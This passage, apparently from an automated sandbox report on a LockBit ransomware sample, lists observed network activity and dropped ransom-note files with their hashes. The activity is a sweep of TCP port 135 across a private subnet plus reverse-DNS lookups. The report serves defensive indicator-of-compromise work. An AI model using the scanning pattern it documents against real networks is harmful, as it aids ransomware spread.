| N/A | 10.127.0.230:135 | tcp | |
| N/A | 10.127.0.228:135 | tcp | |
| N/A | 10.127.0.227:135 | tcp | |
| N/A | 10.127.0.226:135 | tcp | |
| N/A | 10.127.0.225:135 | tcp | |
| N/A | 10.127.0.224:135 | tcp | |
| N/A | 10.127.0.223:135 | tcp | |
| N/A | 10.127.0.222:135 | tcp | |
| N/A | 10.127.0.221:135 | tcp | |
| N/A | 10.127.0.220:135 | tcp | |
| N/A | 10.127.0.242:135 | tcp | |
| N/A | 10.127.0.218:135 | tcp | |
| N/A | 10.127.0.219:135 | tcp | |
| N/A | 10.127.0.217:135 | tcp | |
| N/A | 10.127.0.215:135 | tcp | |
| N/A | 10.127.0.216:135 | tcp | |
| N/A | 10.127.0.214:135 | tcp | |
| N/A | 10.127.0.212:135 | tcp | |
| N/A | 10.127.0.213:135 | tcp | |
| N/A | 10.127.0.211:135 | tcp | |
| N/A | 10.127.0.210:135 | tcp | |
| N/A | 10.127.0.209:135 | tcp | |
| N/A | 10.127.0.208:135 | tcp | |
| N/A | 10.127.0.206:135 | tcp | |
| N/A | 10.127.0.205:135 | tcp | |
| N/A | 10.127.0.204:135 | tcp | |
| N/A | 10.127.0.203:135 | tcp | |
| N/A | 10.127.0.202:135 | tcp | |
| N/A | 10.127.0.201:135 | tcp | |
| N/A | 10.127.0.200:135 | tcp | |
| N/A | 10.127.0.199:135 | tcp | |
| N/A | 10.127.0.198:135 | tcp | |
| N/A | 10.127.0.195:135 | tcp | |
| N/A | 10.127.0.197:135 | tcp | |
| N/A | 10.127.0.196:135 | tcp | |
| N/A | 10.127.0.194:135 | tcp | |
| N/A | 10.127.0.192:135 | tcp | |
| N/A | 10.127.0.191:135 | tcp | |
| N/A | 10.127.0.190:135 | tcp | |
| N/A | 10.127.0.189:135 | tcp | |
| N/A | 10.127.0.188:135 | tcp | |
| N/A | 10.127.0.187:135 | tcp | |
| N/A | 10.127.0.186:135 | tcp | |
| N/A | 10.127.0.185:135 | tcp | |
| N/A | 10.127.0.184:135 | tcp | |
| N/A | 10.127.0.183:135 | tcp | |
| N/A | 10.127.0.182:135 | tcp | |
| N/A | 10.127.0.181:135 | tcp | |
| N/A | 10.127.0.180:135 | tcp | |
| N/A | 10.127.0.179:135 | tcp | |
| N/A | 10.127.0.178:135 | tcp | |
| N/A | 10.127.0.177:135 | tcp | |
| N/A | 10.127.0.176:135 | tcp | |
| N/A | 10.127.0.175:135 | tcp | |
| N/A | 10.127.0.174:135 | tcp | |
| N/A | 10.127.0.173:135 | tcp | |
| N/A | 10.127.0.172:135 | tcp | |
| N/A | 10.127.0.207:135 | tcp | |
| N/A | 10.127.0.170:135 | tcp | |
| N/A | 10.127.0.169:135 | tcp | |
| N/A | 10.127.0.168:135 | tcp | |
| N/A | 10.127.0.167:135 | tcp | |
| N/A | 10.127.0.166:135 | tcp | |
| N/A | 10.127.0.165:135 | tcp | |
| N/A | 10.127.0.164:135 | tcp | |
| N/A | 10.127.0.163:135 | tcp | |
| N/A | 10.127.0.162:135 | tcp | |
| N/A | 10.127.0.161:135 | tcp | |
| N/A | 10.127.0.160:135 | tcp | |
| N/A | 10.127.0.159:135 | tcp | |
| N/A | 10.127.0.158:135 | tcp | |
| N/A | 10.127.0.157:135 | tcp | |
| N/A | 10.127.0.156:135 | tcp | |
| N/A | 10.127.0.155:135 | tcp | |
| N/A | 10.127.0.154:135 | tcp | |
| N/A | 10.127.0.153:135 | tcp | |
| N/A | 10.127.0.152:135 | tcp | |
| N/A | 10.127.0.151:135 | tcp | |
| N/A | 10.127.0.150:135 | tcp | |
| N/A | 10.127.0.149:135 | tcp | |
| N/A | 10.127.0.148:135 | tcp | |
| N/A | 10.127.0.147:135 | tcp | |
| N/A | 10.127.0.146:135 | tcp | |
| N/A | 10.127.0.145:135 | tcp | |
| N/A | 10.127.0.144:135 | tcp | |
| N/A | 10.127.0.171:135 | tcp | |
| N/A | 10.127.0.143:135 | tcp | |
| N/A | 10.127.0.142:135 | tcp | |
| N/A | 10.127.0.141:135 | tcp | |
| N/A | 10.127.0.140:135 | tcp | |
| N/A | 10.127.0.139:135 | tcp | |
| N/A | 10.127.0.138:135 | tcp | |
| N/A | 10.127.0.121:135 | tcp | |
| N/A | 10.127.0.137:135 | tcp | |
| N/A | 10.127.0.120:135 | tcp | |
| N/A | 10.127.0.8:135 | tcp | |
| N/A | 10.127.0.7:135 | tcp | |
| N/A | 10.127.0.6:135 | tcp | |
| N/A | 10.127.0.5:135 | tcp | |
| N/A | 10.127.0.4:135 | tcp | |
| N/A | 10.127.0.3:135 | tcp | |
| N/A | 10.127.0.2:135 | tcp | |
| N/A | 10.127.0.0:135 | tcp | |
| N/A | 10.127.0.1:135 | tcp | |
| N/A | 10.127.0.252:135 | tcp | |
| N/A | 10.127.0.254:135 | tcp | |
| N/A | 10.127.0.253:135 | tcp | |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 107.211.222.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 130.211.222.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 210.143.182.52.in-addr.arpa | udp |
Files
C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\Restore-My-Files.txt
| MD5 | 799161fca9a3167f25cc591922e9d4bf |
| SHA1 | 578a60791842ac09f171a72b6cc2997b8307b4a1 |
| SHA256 | 6ebba29a420264342daf19a0d5d1dd36ecd56f5082b1d74d95733bc210ec75df |
| SHA512 | 0b23abb807fc49f995a0d3a8bce125770ad6b2cb9395e2d5317bdce394fddd165e1779c7434c91e479996f6caad88e6179bb13ac406aacc236b882cbc0381bb6 |
C:\Users\Admin\Desktop\LockBit-note.hta
| MD5 | 1ab66d44b4dfadff2a914174e24c8cf2 |
| SHA1 | 99214f760f492208095d8091d4b874df871858e5 |
| SHA256 | fc17dec8009c6af6add2a03807cc1ad8b08c2f34a0bff4922ecce9cba85de62e |
| SHA512 | fbb46563c2b84e1e36980a818ddae1341f899e6d6159216c45b9be37da558b633b4f1243d0f9665434f31dd5b7a2e5d062a50506b7a5be57897ede5c85077e88 |